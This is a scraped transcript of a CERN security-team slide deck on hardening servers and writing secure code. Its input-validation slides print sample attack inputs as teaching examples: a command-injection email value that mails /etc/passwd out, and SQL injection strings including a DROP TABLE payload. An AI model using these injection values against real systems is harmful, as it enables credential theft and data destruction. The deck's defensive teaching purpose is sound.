Presentation is loading. Please wait.

Presentation is loading. Please wait.

Sebastian Lopienski CERN Computer Security Team Securing your servers and code (and how we can help you)

Published byWilfrid Wright Modified over 8 years ago

Similar presentations

Presentation on theme: "Sebastian Lopienski CERN Computer Security Team Securing your servers and code (and how we can help you)"— Presentation transcript:

1 Sebastian Lopienski CERN Computer Security Team Securing your servers and code (and how we can help you)

2 Dr. Stefan Lüders (CERN IT/CO) ― DESY ― 20. Februar 2007 Computer.Security@cern.ch — “Computer Security Day” — slide 2 Outline ►How to secure your servers ►How to secure your code ►How the Computer Security Team can help you

3 Dr. Stefan Lüders (CERN IT/CO) ― DESY ― 20. Februar 2007 Computer.Security@cern.ch — “Computer Security Day” — slide 3 Things to avoid Security measures that can be easily bypassed

4 How to secure your servers Part 1:

5 Dr. Stefan Lüders (CERN IT/CO) ― DESY ― 20. Februar 2007 Computer.Security@cern.ch — “Computer Security Day” — slide 5 Checklist 1.Harden the OS and Applications 2.Keep the OS and Applications up-to-date 3.Use a local firewall 4.Take advantage of the logs 5.Ensure that all passwords are secure 6.Take extra precautions for privileged accesses 7.Use security products when relevant 8.Take into account physical security 9.Keep your security knowledge up-to-date.

6 Dr. Stefan Lüders (CERN IT/CO) ― DESY ― 20. Februar 2007 Computer.Security@cern.ch — “Computer Security Day” — slide 6 1. Harden the OS & applications ► minimise the number of  packages installed  accounts enabled  network services offered  privileged processes running (this includes running with least privileges whenever possible) ► tighten the configuration of the major services (this includes limiting access to the minimum) Why? ► to limit exposure ► to limit number of components that you have to secure

7 Dr. Stefan Lüders (CERN IT/CO) ― DESY ― 20. Februar 2007 Computer.Security@cern.ch — “Computer Security Day” — slide 7 2. Keep the OS & apps updated ► install all the security patches as soon as possible ► ideally, use a system that automates patching this applies to the OS and to all the software installed on the server, and especially to network services Why? ► to close known vulnerabilities in OS and software ► and to make sure that patching is not forgotten in the future

8 Dr. Stefan Lüders (CERN IT/CO) ― DESY ― 20. Februar 2007 Computer.Security@cern.ch — “Computer Security Day” — slide 8 3. Use a local firewall ► install a local firewall configured to only allow what is expected (i.e. default policy is deny) ► ideally, also filter outgoing network traffic Why? ► to limit exposure (by restricting incoming traffic) ► to prevent criminals using backdoors and remote access (by restricting incoming and outgoing traffic)

9 Dr. Stefan Lüders (CERN IT/CO) ― DESY ― 20. Februar 2007 Computer.Security@cern.ch — “Computer Security Day” — slide 9 4. Take advantage of the logs ► select appropriate logging levels for all sensitive components ► frequently review the logs to detect suspicious activity ► ideally, store the logs remotely to avoid tampering  e.g. to Central Security Logging service http://cern.ch/security/services/en/csl.shtmlhttp://cern.ch/security/services/en/csl.shtml Why? ► to detect attacks and incidents ► to be able to investigate them (find reasons, and learn from them)

10 Dr. Stefan Lüders (CERN IT/CO) ― DESY ― 20. Februar 2007 Computer.Security@cern.ch — “Computer Security Day” — slide 10 Things to avoid Security measures that get disabled with time, when new features are installed

11 Dr. Stefan Lüders (CERN IT/CO) ― DESY ― 20. Februar 2007 Computer.Security@cern.ch — “Computer Security Day” — slide 11 ► make sure that  the passwords used are good enough (ideally, enforce this with the appropriate tools)  the passwords are not exposed (this includes using encrypted protocols such as https, or services like SINDES)  the passwords are changed regularly this applies also to other authentication methods, e.g. SSH keys Why? ► because weak and badly protected passwords are very common attack vectors 5. Ensure password security

12 Dr. Stefan Lüders (CERN IT/CO) ― DESY ― 20. Februar 2007 Computer.Security@cern.ch — “Computer Security Day” — slide 12 6. Precautions for privileged access ► restrict privileged accesses to the bare minimum ► use delegation to minimise the number of operations requiring full privileges (for instance use sudo on Unix/Linux) ► log all actions executed with system privileges Why? ► because privileged access is what criminals are after

13 Dr. Stefan Lüders (CERN IT/CO) ― DESY ― 20. Februar 2007 Computer.Security@cern.ch — “Computer Security Day” — slide 13 7. Use relevant security products ► anti-virus (ideally, with automatic signature update) ► Intrusion Detection Systems (both host-based and network-based) ► integrity checkers to detect system modifications e.g. rpm –V, Tripwire, rkhunter, chkrootkit; see also http://cern.ch/security/faq/en/rootkits.shtmlhttp://cern.ch/security/faq/en/rootkits.shtml Why? ► because they help prevent and detect intrusions

14 Dr. Stefan Lüders (CERN IT/CO) ― DESY ― 20. Februar 2007 Computer.Security@cern.ch — “Computer Security Day” — slide 14 Things to avoid Security solutions that do not cover the whole exposure area

15 Dr. Stefan Lüders (CERN IT/CO) ― DESY ― 20. Februar 2007 Computer.Security@cern.ch — “Computer Security Day” — slide 15 8. Physical access ► take into account physical security (when relevant) Why? ► because malicious person with physical access can bypass most protections (e.g. directly log in as root)

16 Dr. Stefan Lüders (CERN IT/CO) ― DESY ― 20. Februar 2007 Computer.Security@cern.ch — “Computer Security Day” — slide 16 9. Security knowledge ► keep your security knowledge up-to-date visit http://cern.ch/security/reports to read/watch:http://cern.ch/security/reports  monthly security reports for CERN  security reports from SWITCH CERT  various presentations etc. follow security training, or just contact Computer.Security@cern.chComputer.Security@cern.ch Why? ► to learn about threats, attack vectors etc., and protect yourself - before they affect you

17 Dr. Stefan Lüders (CERN IT/CO) ― DESY ― 20. Februar 2007 Computer.Security@cern.ch — “Computer Security Day” — slide 17 Be lazy, and delegate! If you manage a server for your experiment, consider making it a VOBOX ► many of the points discussed above will be done for you ! ► contact your VO Coordinator for details

18 How to secure your code Part 2:

19 Dr. Stefan Lüders (CERN IT/CO) ― DESY ― 20. Februar 2007 Computer.Security@cern.ch — “Computer Security Day” — slide 19 Software is vulnerable Vulnerabilities reported yesterday From secunia.com

20 Dr. Stefan Lüders (CERN IT/CO) ― DESY ― 20. Februar 2007 Computer.Security@cern.ch — “Computer Security Day” — slide 20 When to start? Security should be foreseen as part of the system from the very beginning, not added as a layer at the end ► the latter solution produces insecure code (tricky patches instead of neat solutions) ► it may limit functionality ► and will cost much more You can’t add security in version 2.0

21 Dr. Stefan Lüders (CERN IT/CO) ― DESY ― 20. Februar 2007 Computer.Security@cern.ch — “Computer Security Day” — slide 21 Software life-cycle requirements design implementation testing deployment maintenance Security must be part of all these phases!

22 Dr. Stefan Lüders (CERN IT/CO) ― DESY ― 20. Februar 2007 Computer.Security@cern.ch — “Computer Security Day” — slide 22 Architecture ►Modularity: divide program into semi-independent parts ► small, well-defined interfaces to each module/function ►Isolation: ► each part should work correctly even if others fail (return wrong results, send requests with invalid arguments) ►Defense in depth: build multiple layers of defense ►Simplicity (complex => insecure)

23 Dr. Stefan Lüders (CERN IT/CO) ― DESY ― 20. Februar 2007 Computer.Security@cern.ch — “Computer Security Day” — slide 23 Multiple layers of defense XIII century XXI century

24 Dr. Stefan Lüders (CERN IT/CO) ― DESY ― 20. Februar 2007 Computer.Security@cern.ch — “Computer Security Day” — slide 24 Complexity System calls in Apache

25 Dr. Stefan Lüders (CERN IT/CO) ― DESY ― 20. Februar 2007 Computer.Security@cern.ch — “Computer Security Day” — slide 25 Complexity System calls in IIS

26 Dr. Stefan Lüders (CERN IT/CO) ― DESY ― 20. Februar 2007 Computer.Security@cern.ch — “Computer Security Day” — slide 26 Design – (some) golden rules Make security-sensitive parts of your code small Least privilege principle ► program should run on the least privileged account possible ► same for accessing databases, files etc. ► revoke a privilege when it is not needed anymore Choose safe defaults; deny by default Fail gracefully and securely Question again your assumptions, decisions etc.

27 Dr. Stefan Lüders (CERN IT/CO) ― DESY ― 20. Februar 2007 Computer.Security@cern.ch — “Computer Security Day” — slide 27 Things to avoid Procedures or docs that are impossible to follow; code impossible to maintain

28 Dr. Stefan Lüders (CERN IT/CO) ― DESY ― 20. Februar 2007 Computer.Security@cern.ch — “Computer Security Day” — slide 28 Implementation @P=split//,".URRUU\c8R";@d=split//,"\n rekcah xinU / lreP rehtona tsuJ";sub p{@p{"r$p","u$p"}=(P,P);pipe"r$p","u$p ";++$p;($q*=2)+=$f=!fork;map{$P=$P[$f| ord($p{$_})&6];$p{$_}=/^$P/ix?$P:close $_}keys%p}p;p;p;p;p;map{$p{$_}=~/^[P.] /&& close$_}%p;wait until$?; map{ /^r/&& }%p;$_=$d[$q];sleep rand(2) if/\S/;print ► What does this code do? ► Would you like to work on it? ► Is it secure? Write good quality, maintainable, self-documenting code!

29 Dr. Stefan Lüders (CERN IT/CO) ― DESY ― 20. Februar 2007 Computer.Security@cern.ch — “Computer Security Day” — slide 29 Enemy number one: Input data ►Don’t trust input data – input data is the single most common reason of security-related incidents

30 Dr. Stefan Lüders (CERN IT/CO) ― DESY ― 20. Februar 2007 Computer.Security@cern.ch — “Computer Security Day” — slide 30 Enemy #1: Input data (cont.) Example: your script sends e-mails with the following shell command: cat confirmation | mail $email and someone provides the following e-mail address: me@fake.com; cat /etc/passwd | mail me@real.com cat confirmation | mail me@fake.com; cat /etc/passwd | mail me@real.com

31 Dr. Stefan Lüders (CERN IT/CO) ― DESY ― 20. Februar 2007 Computer.Security@cern.ch — “Computer Security Day” — slide 31 Enemy #1: Input data (cont.) Example (SQL Injection): your webscript authenticates users against a database: select count(*) from users where name = ’$name’ and pwd = ’$password’; but an attacker provides one of these passwords: anything’ or ’x’ = ’x XXXXX’; drop table users; -- select count(*) from users where name = ’$name’ and pwd = ’anything’ or ’x’ = ’x’; select count(*) from users where name = ’$name’ and pwd = ’XXXXX’; drop table users; --’;

32 Dr. Stefan Lüders (CERN IT/CO) ― DESY ― 20. Februar 2007 Computer.Security@cern.ch — “Computer Security Day” — slide 32 Input validation Input validation is crucial Consider all input dangerous until proven valid Default-deny rule ► allow only “good” characters and formulas and reject others (instead of looking for “bad” ones) ► use regular expressions Validation at different levels: ► at input data entry point ► right before taking security decisions based on that data

33 Dr. Stefan Lüders (CERN IT/CO) ― DESY ― 20. Februar 2007 Computer.Security@cern.ch — “Computer Security Day” — slide 33 Coding – advice (cont.) Separate data from code: ►Careful with shell and eval function ► sample line from a Perl script: system(”rpm –qpi $filename”); but what if $filename contains illegal characters: | ; ` \ ► popen() also invokes the shell indirectly ► same for open(FILE, ”grep –r $needle |”); ► similar: eval() function (evaluates a string as code) ►Use parameterized SQL queries to avoid SQL injection: $query = ”select count(*) from users where name = $1 and pwd = $2”; pg_query_params($connection, $query, array($login, $password));

34 Dr. Stefan Lüders (CERN IT/CO) ― DESY ― 20. Februar 2007 Computer.Security@cern.ch — “Computer Security Day” — slide 34 Temporary file – or is it? ► symbolic link attack: someone guesses the name of your temporary file, and creates a link from it to another file (i.e. /bin/bash) ► good temporary file has a name that is hard to guess ► use tmpfile() (C/C++), mktemp shell command or similar Coding – advice (cont.) /tmp/mytmpfile/bin/bash /root/myscript.sh writes data symbolic link

35 Dr. Stefan Lüders (CERN IT/CO) ― DESY ― 20. Februar 2007 Computer.Security@cern.ch — “Computer Security Day” — slide 35 Source code static analysis tools Tools that analyse source code, and look for potential: ► security holes ► functionality bugs (including those not security related) Recommendations for C/C++, Java, Python, Perl, PHP available at http://cern.ch/security/recommendations/en/code_tools.shtml http://cern.ch/security/recommendations/en/code_tools.shtml ► RPMs provided, some available on LXPLUS ► trivial to use There is no magic: ► even the best tool will miss most non-trivial errors ► they will just report the findings, but won’t fix the bugs Still, using code analysis tools is highly recommended! These tools will help you develop better code

36 Dr. Stefan Lüders (CERN IT/CO) ― DESY ― 20. Februar 2007 Computer.Security@cern.ch — “Computer Security Day” — slide 36 Code tools: FindBugs / Java

37 Dr. Stefan Lüders (CERN IT/CO) ― DESY ― 20. Februar 2007 Computer.Security@cern.ch — “Computer Security Day” — slide 37 Code tools: pychecker / Python

38 Dr. Stefan Lüders (CERN IT/CO) ― DESY ― 20. Februar 2007 Computer.Security@cern.ch — “Computer Security Day” — slide 38 Code tools: Pixy / PHP

39 Dr. Stefan Lüders (CERN IT/CO) ― DESY ― 20. Februar 2007 Computer.Security@cern.ch — “Computer Security Day” — slide 39 Things to avoid Security tools that are disabled, or impossible to use

40 How the Computer Security Team can help you Part 3:

41 Dr. Stefan Lüders (CERN IT/CO) ― DESY ― 20. Februar 2007 Computer.Security@cern.ch — “Computer Security Day” — slide 41 Things to avoid Incomplete protection measures that become “temporary” forever

42 Dr. Stefan Lüders (CERN IT/CO) ― DESY ― 20. Februar 2007 Computer.Security@cern.ch — “Computer Security Day” — slide 42 How we ( * ) can help you (*) we = CERN Computer Security Team Web and machine scanning ► vulnerability assessment – black box testing ► automatic scans, but also on demand (Computer.Security@cern.ch)Computer.Security@cern.ch source code tools Central Logging Service training courses security audits and risk assessment (plus of course intrusion detection, incident investigation and response etc.)

43 Dr. Stefan Lüders (CERN IT/CO) ― DESY ― 20. Februar 2007 Computer.Security@cern.ch — “Computer Security Day” — slide 43 Training Security courses available at CTA (http://cta.cern.ch)http://cta.cern.ch free free

44 Dr. Stefan Lüders (CERN IT/CO) ― DESY ― 20. Februar 2007 Computer.Security@cern.ch — “Computer Security Day” — slide 44 Audits, risks assessments etc. The Computer Security Team can assist you with: ► Threat modelling and risk assessment  to ensure that risks are correctly managed, and no major threat is neglected ► Designing system security architecture  when starting a new system or software project ► Security code reviews  before deploying developed code ► Security audits of existing systems  when maintaining existing systems or software Don’t hesitate to contact Computer.Security@cern.chComputer.Security@cern.ch

45 Dr. Stefan Lüders (CERN IT/CO) ― DESY ― 20. Februar 2007 Computer.Security@cern.ch — “Computer Security Day” — slide 45 The new Web site Check out our new Web site http://cern.ch/security

46 Dr. Stefan Lüders (CERN IT/CO) ― DESY ― 20. Februar 2007 Computer.Security@cern.ch — “Computer Security Day” — slide 46 Thank you Any questions? http://www.flickr.com/photos/calavera/65098350

47 Dr. Stefan Lüders (CERN IT/CO) ― DESY ― 20. Februar 2007 Computer.Security@cern.ch — “Computer Security Day” — slide 47 Training course available! “Developing secure software” technical training course ► ½ day, offered for free ► Register at CERN Training CatalogueCERN Training Catalogue

48 Dr. Stefan Lüders (CERN IT/CO) ― DESY ― 20. Februar 2007 Computer.Security@cern.ch — “Computer Security Day” — slide 48 Web and server scanning ►Vulnerability scanning and assessment ► black box approach (we scan without having any inside knowledge) ► automatic scans, but also on demand (Computer.Security@cern.ch)Computer.Security@cern.ch ► in order to find weaknesses before attackers exploit them scanning machines ► looking for unpatched, misconfigured or vulnerable network services ► with Nmap and Nessus scanning Web applications ► looking for Cross-site scripting, SQL Injection, command injection and other vulnerabilities ► with Skipfish, W3AF and Wapiti

49 Dr. Stefan Lüders (CERN IT/CO) ― DESY ― 20. Februar 2007 Computer.Security@cern.ch — “Computer Security Day” — slide 49 Central logging service ►Central storage of syslog messages ► Prevents log corruption during compromises or hardware failures ► Fast detection of anomalous behaviour ► Please, make your code interact with syslog ►Stores essential information for forensics ► legal requirements ► Grid community requirements ► And we can learn from our history ►You already see it ► “Logins from unusual locations" e-mails ► And many more analyses in the background

Download ppt "Sebastian Lopienski CERN Computer Security Team Securing your servers and code (and how we can help you)"

Similar presentations

Security Update Server Registration, Active scanning and Windows patching.

Security Update Server Registration, Active scanning and Windows patching.
Overview of local security issues in Campus Grid environments Bruce Beckles University of Cambridge Computing Service.

Overview of local security issues in Campus Grid environments Bruce Beckles University of Cambridge Computing Service.
Creating Stronger, Safer, Web Facing Code JPL IT Security Mary Rivera June 17, 2011.

Creating Stronger, Safer, Web Facing Code JPL IT Security Mary Rivera June 17, 2011.
1 Chapter 8 Fundamentals of System Security. 2 Objectives In this chapter, you will: Understand the trade-offs among security, performance, and ease of.

1 Chapter 8 Fundamentals of System Security. 2 Objectives In this chapter, you will: Understand the trade-offs among security, performance, and ease of.
Online Banking Fraud Prevention Recommendations and Best Practices This document provides you with fraud prevention best practices that every employee.

Online Banking Fraud Prevention Recommendations and Best Practices This document provides you with fraud prevention best practices that every employee.
1 June 1, 2015 Secure access to project budget information for OAR Principal Investigators Eugene F Burger Sylvia Scott Tracey Nakamura John L Forbes PMEL.

1 June 1, 2015 Secure access to project budget information for OAR Principal Investigators Eugene F Burger Sylvia Scott Tracey Nakamura John L Forbes PMEL.
System and Network Security Practices COEN 351 E-Commerce Security.

System and Network Security Practices COEN 351 E-Commerce Security.
It’s always better live. MSDN Events Security Best Practices Part 2 of 2 Reducing Vulnerabilities using Visual Studio 2008.

It’s always better live. MSDN Events Security Best Practices Part 2 of 2 Reducing Vulnerabilities using Visual Studio 2008.
Chapter 7 HARDENING SERVERS.

Chapter 7 HARDENING SERVERS.
Computer Security: Principles and Practice

Computer Security: Principles and Practice
Operating System Security Chapter 9. Operating System Security Terms and Concepts An operating system manages and controls access to hardware components.

Operating System Security Chapter 9. Operating System Security Terms and Concepts An operating system manages and controls access to hardware components.
Firewall 2 * Essential Network Security Book Slides. IT352 | Network Security |Najwa AlGhamdi 1.

Firewall 2 * Essential Network Security Book Slides. IT352 | Network Security |Najwa AlGhamdi 1.
Payment Card Industry (PCI) Data Security Standard

Payment Card Industry (PCI) Data Security Standard
Installing and Configuring a Secure Web Server COEN 351 David Papay.

Installing and Configuring a Secure Web Server COEN 351 David Papay.
Securing Operating Systems Chapter 10. Security Maintenance Practices and Principles Basic proactive security can prevent many problems Maintenance involves.

Securing Operating Systems Chapter 10. Security Maintenance Practices and Principles Basic proactive security can prevent many problems Maintenance involves.
Lesson 8-Information Security Process. Overview Introducing information security process. Conducting an assessment. Developing a policy. Implementing.

Lesson 8-Information Security Process. Overview Introducing information security process. Conducting an assessment. Developing a policy. Implementing.
Brad Baker CS526 May 7 th, 2008 5/7/2008 1. 1. Project goals 2. Test Environment 3. The Problem 4. Some Solutions 5. ModSecurity Overview 6. ModSecurity.

Brad Baker CS526 May 7 th, /7/ Project goals 2. Test Environment 3. The Problem 4. Some Solutions 5. ModSecurity Overview 6. ModSecurity.
Csci5233 Computer Security1 Bishop: Chapter 27 System Security.

Csci5233 Computer Security1 Bishop: Chapter 27 System Security.
Module 14: Configuring Server Security Compliance

Module 14: Configuring Server Security Compliance
Operating System Security. OS manages and controls access to hardware components Older OSs focused on ensuring data confidentiality Modern operating systems.

Operating System Security. OS manages and controls access to hardware components Older OSs focused on ensuring data confidentiality Modern operating systems.

Similar presentations

Ads by Google